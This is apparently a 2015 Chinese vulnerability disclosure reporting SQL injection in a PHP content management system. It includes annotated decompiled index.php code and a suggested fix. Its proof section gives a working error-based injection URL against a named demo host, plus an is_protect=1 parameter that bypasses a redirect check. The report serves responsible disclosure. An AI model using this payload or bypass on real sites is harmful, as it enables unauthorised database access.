2015-03-27: 细节已通知厂商并且等待厂商处理中 2015-04-01: 厂商已经确认,细节仅向厂商公开 2015-04-04: 细节向第三方安全合作伙伴开放 2015-05-26: 细节向核心白帽子及相关领域专家公开 2015-06-05: 细节向普通白帽子公开 2015-06-15: 细节向实习白帽子公开 2015-06-30: 细节向公众公开
在 demo 站点测试成功。看到别人之前的提交被转给 cncert 处理了，所以厂商我就选择 cncert。
访问
http://test.nitc.cc/office/privilege.php?action=login
可以看到下面的版本信息：v4.0。漏洞页面：index.php
<?php
/*********************/
/*                   */
/* Version : 5.1.0   */
/* Author  : RM      */
/* Comment : 071223  */
/*                   */
/*********************/

/**
 * Renders the themed template $php_file with the given variables in scope.
 *
 * Builds the template path from ROOT_PATH and the configured theme name
 * ($GLOBALS['_CFG']['template']). If that file exists, the theme's XML config,
 * $assign and the result of initpublic() are pulled into local scope with
 * extract() and the template is require()d. Nothing happens when the file is
 * missing.
 *
 * @param string $php_file Template file name, relative to the theme directory.
 * @param array  $assign   Variables to expose to the template.
 */
function exe_php_page( $php_file, $assign )
{
    $template = ROOT_PATH."themes/".$GLOBALS['_CFG']['template']."/".$php_file;
    if ( file_exists( $template ) )
    {
        extract( load_xml_config( $GLOBALS['_CFG']['template'] ) );
        // NOTE(review): extract() overwrites existing locals by default, so an
        // $assign key named "template" would replace the path computed above
        // before the require() below runs. Callers should not pass that key.
        extract( $assign );
        // $language_cur is neither a parameter nor assigned here; presumably it
        // comes from one of the extract() calls above — verify against the config.
        extract( initpublic( $language_cur, $template ) );
        require( $template );
    }
}

define( "IN_LOCK", TRUE );
// ROOTPATH (no underscore) is defined here; exe_php_page() above reads
// ROOT_PATH, whose definition is not visible in this excerpt.
define( "ROOTPATH", str_replace( "\\", "/", dirname( __FILE__ )."/" ) );
// Send the visitor to the installer until includes/install.lock exists.
if ( !file_exists( ROOTPATH."includes/install.lock" ) )
{
    header( "location:install/" );
    exit( );
}
$is_dynamic = 1;
require( "includes/init.php" );
// $is_protect is read from $_REQUEST, i.e. it is client-controlled (GET, POST
// or cookie). Any non-zero value skips the index.html redirect below, which is
// the only thing keeping the dynamic index.php?action=... paths unreachable
// when pseudo_static != 1.
// (Reporter's note: this parameter is key — a value of 1 bypasses the check below.)
$is_protect = isset( $_REQUEST['is_protect'] ) ? $_REQUEST['is_protect'] : 0;
if ( $GLOBALS['_CFG']['pseudo_static'] != 1 && $is_protect == 0 )
{
    header( "location:index.html" );
    exit( );
}
....
// The if/else chain this branch belongs to begins in the part elided above.
// $db, $site, $language, $_LANG, $url_separate and $channel_flag are not
// defined in this excerpt (presumably set up by includes/init.php).
else if ( $_GET['action'] == "content" )
{
    // SECURITY: $rid comes straight from $_GET and is concatenated into the
    // query below with no cast and no quoting — this is the SQL injection
    // reported on this page. Cast it ((int) $rid) or bind it as a query
    // parameter before it reaches the database.
    // (Reporter's note: not sanitised.)
    $rid = $_GET['rid'];
    if ( $url_separate == "_" )
    {
        $channel_flag = str_replace( "_", "-", $channel_flag );
    }
    // (Reporter's note: not wrapped in single quotes — injectable.)
    $content = $db->getAll( "select channel_content_id,channel_category_id,date_added,is_color,color,is_underline,is_bold,is_italic,filename,small_image,original_image,sort_order from ".$site->table( "channel_content" ).( " where channel_content_id=".$rid ) );
    // Values from the selected row; $sort_order and $news_id11 are then
    // concatenated unquoted into the pre/next/related queries below, so those
    // queries rely on the stored column values being plain integers.
    // $content[0] is read without checking that a row was returned.
    $sort_order = $content[0]['sort_order'];
    $date_added = $content[0]['date_added'];
    $news_id11 = $content[0]['channel_category_id'];
    // Previous item in the same category: higher sort_order, or same
    // sort_order and later date_added. The SQL string literal below contains a
    // line break; the continuation line is kept at column 0 to preserve it.
    $pre_content = $db->getRow( "select content.channel_content_id,content_desc.name from ".$site->table( "channel_content" )." as content left join ".$site->table( "channel_content_desc" )." as content_desc on content.channel_content_id=content_desc.channel_content_id where content.channel_category_id=".$news_id11." and content_desc.language_id=".$language['language_id'].( " and (content.sort_order > ".$sort_order." 
or (content.date_added > '{$date_added}' and content.sort_order = '{$sort_order}')) order by content.sort_order asc, content.date_added asc LIMIT 0,1" ) );
    if ( $pre_content )
    {
        $pre_content_url = get_channel_content_url( "url", $language['directory'], $language['default_value'], $pre_content['name'], $pre_content['channel_content_id'], $channel_flag );
        // NOTE(review): the URL and label are placed into HTML without escaping
        // here; whether get_channel_content_url() escapes its output is not
        // visible in this excerpt — confirm before treating this as safe.
        $pre_link = "<a href='".$pre_content_url."'>".$_LANG['content_previous']."</a>";
    }
    // Next item: mirror of the query above with the comparisons reversed.
    $next_content = $db->getRow( "select content.channel_content_id,content_desc.name from ".$site->table( "channel_content" )." as content left join ".$site->table( "channel_content_desc" )." as content_desc on content.channel_content_id=content_desc.channel_content_id where content.channel_category_id=".$news_id11." and content_desc.language_id=".$language['language_id'].( " and (content.sort_order < ".$sort_order." or (content.date_added < '{$date_added}' and content.sort_order = '{$sort_order}')) order by content.sort_order desc, content.date_added desc LIMIT 0,1" ) );
    if ( $next_content )
    {
        $next_content_url = get_channel_content_url( "url", $language['directory'], $language['default_value'], $next_content['name'], $next_content['channel_content_id'], $channel_flag );
        $next_link = "<a href='".$next_content_url."'>".$_LANG['content_next']."</a>";
    }
    // All content rows of the same category, newest/highest sort_order first.
    $related_content = $db->getAll( "select channel_content_id,channel_category_id,date_added,is_color,color,is_underline,is_bold,is_italic,filename,small_image,original_image from ".$site->table( "channel_content" )." where channel_category_id=".$news_id11." order by sort_order desc, date_added desc" );
    $cnt = 0;
    $id_arr = array( );
    $max_id = 0;
    $relate_arr = array( );
    // Collect up to 7 related entries (URL, name, id) for the current
    // language; one extra query per row. The else branch cannot be reached
    // from the query above, since every row already has
    // channel_category_id = $news_id11.
    foreach ( $related_content as $key => $value )
    {
        if ( $value['channel_category_id'] == $news_id11 )
        {
            // SQL string literal with an embedded line break (see note above).
            $content_desc = $db->getRow( "select * from ".$site->table( "channel_content_desc" )." where channel_content_id=".$value['channel_content_id']." 
and language_id=".$language['language_id'] );
            if ( $content_desc )
            {
                $content_url = get_channel_content_url( "url", $language['directory'], $language['default_value'], $content_desc['name'], $value['channel_content_id'], $channel_flag );
                $relate_arr[] = array( "content_url" => $content_url, "name" => $content_desc['name'], "channel_content_id" => $value['channel_content_id'] );
                ++$cnt;
                if ( 7 <= $cnt )
                {
                    // The second break is unreachable (decompiler artefact).
                    break;
                    break;
                }
            }
        }
        else
        {
            $id_arr[] = $value['channel_content_id'];
            if ( $max_id == 0 )
            {
                $max_id = $value['channel_content_id'] + 1;
            }
        }
    }
....
漏洞证明：访问
http://test.nitc.cc/index.php?action=content&rid= 1 -(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#
以 POST 方式提交
is_protect=1
注入报错，版本信息已经回显出来了，不进一步深究。
修复方案：对 rid 参数进行过滤处理（例如强制转换为整数后再拼入 SQL，或改用参数化查询）。
危害等级:中
漏洞Rank:9
确认时间:2015-04-01 13:38
CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。
暂无